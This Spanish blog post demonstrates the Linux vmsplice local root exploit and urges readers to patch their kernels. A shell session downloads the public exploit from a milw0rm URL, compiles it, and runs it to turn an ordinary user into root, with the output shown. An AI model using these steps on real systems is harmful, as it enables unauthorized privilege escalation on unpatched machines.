Vulnerabilidad grave kernel Linux
Como muchos de vosotros sabreis, ha surgido una grave vulneribilidad en el kernel de linux que permite a un usuario local ser root. La actulización del kernel hay que hacerla obligada, debido a la simpleza del exploit.
Si quereis "jugar" con el podeis probar en vuestro sistema, para ello solo necesitaremos bajarnos el exploit y compilarlo. Una vez hecho lo ejecutaremos y os aosmbrareis de la simpleza.
El bug ya ha sido resulto, actualizad vuestro kernel.
Si quereis ver como se hace, seguid leyendo……
Bueno para poder jugar con el exploit, debemos tener instalado build-essential y los linux-headers correspondientes a nuestro kernel.
root@servidor:/# apt-get install linux-headers-`uname -r` build-essential
root@servidor:/# cd cosas
root@servidor:/cosas# lynx -dump http://www.milw0rm.com/exploits/5092 > fuente.c
root@servidor:/cosas# gcc fuente.c -o exploit
root@servidor:/cosas# su juanmi
juanmi@servidor:/cosas$ whoami
juanmi
juanmi@servidor:/cosas$ ./exploit
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[ ] mmap: 0x0 .. 0x1000
[ ] page: 0x0
[ ] page: 0x20
[ ] mmap: 0x4000 .. 0x5000
[ ] page: 0x4000
[ ] page: 0x4020
[ ] mmap: 0x1000 .. 0x2000
[ ] page: 0x1000
[ ] mmap: 0xb7d8d000 .. 0xb7dbf000
[ ] root
root@servidor:/cosas# whoami
root
root@servidor:/cosas#
Actualicen sus kernels 😉
Warning: Use of undefined constant type - assumed 'type' (this will throw an Error in a future version of PHP) in /home/improvisa_com/web/improvisa.com/public_html/wp-content/themes/grassland/comments.php on line 38
Vaya Vaya, el linux también falla…
Jeje, eres un crack, el troll de los trolls 😉
Por supuesto que falla, nada ni nadie es perfecto, pero lo bueno es que en 1 dia estaba resuelto 😉